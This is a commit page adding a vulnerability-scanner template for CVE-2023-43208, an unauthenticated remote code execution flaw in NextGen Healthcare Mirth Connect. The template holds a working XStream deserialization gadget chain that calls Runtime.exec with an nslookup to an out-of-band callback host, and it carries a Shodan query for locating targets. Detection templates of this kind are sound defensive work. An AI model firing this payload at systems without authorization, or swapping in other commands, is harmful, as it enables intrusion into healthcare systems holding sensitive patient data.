Create CVE-2023-43208.yaml
Prince Chaddha
GitHub
parent
1615bad02c
commit
7da719de3b
|
|
@ -0,0 +1,106 @@
|
|||
id: CVE-2023-43208
|
||||
|
||||
info:
|
||||
name: NextGen Healthcare Mirth Connect - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.
|
||||
impact: |
|
||||
Successful exploitation could result in unauthorized access and potential compromise of sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
|
||||
- https://github.com/nvn1729/advisories
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-43208
|
||||
epss-score: 0.00349
|
||||
epss-percentile: 0.71422
|
||||
cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: nextgen
|
||||
product: mirth_connect
|
||||
shodan-query: title:"mirth connect administrator"
|
||||
tags: cve,cve2023,nextgen,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /api/server/version HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: OpenAPI
|
||||
- |
|
||||
POST /api/users HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: OpenAPI
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<string>abcd</string>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
|
||||
<target class="org.apache.commons.collections4.functors.ChainedTransformer">
|
||||
<iTransformers>
|
||||
<org.apache.commons.collections4.functors.ConstantTransformer>
|
||||
<iConstant class="java-class">java.lang.Runtime</iConstant>
|
||||
</org.apache.commons.collections4.functors.ConstantTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>getMethod</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.String</java-class>
|
||||
<java-class>[Ljava.lang.Class;</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<string>getRuntime</string>
|
||||
<java-class-array/>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>invoke</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.Object</java-class>
|
||||
<java-class>[Ljava.lang.Object;</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<null/>
|
||||
<object-array/>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>exec</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.String</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
</iTransformers>
|
||||
</target>
|
||||
<methodName>transform</methodName>
|
||||
<eventTypes>
|
||||
<string>compareTo</string>
|
||||
</eventTypes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
</sorted-set>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'compare_versions(version, "<4.4.1")'
|
||||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 500'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body_1
|
||||
name: version
|
||||
group: 1
|
||||
regex:
|
||||
- '(.*)'
|
||||
internal: true
|
||||
Loading…
Reference in New Issue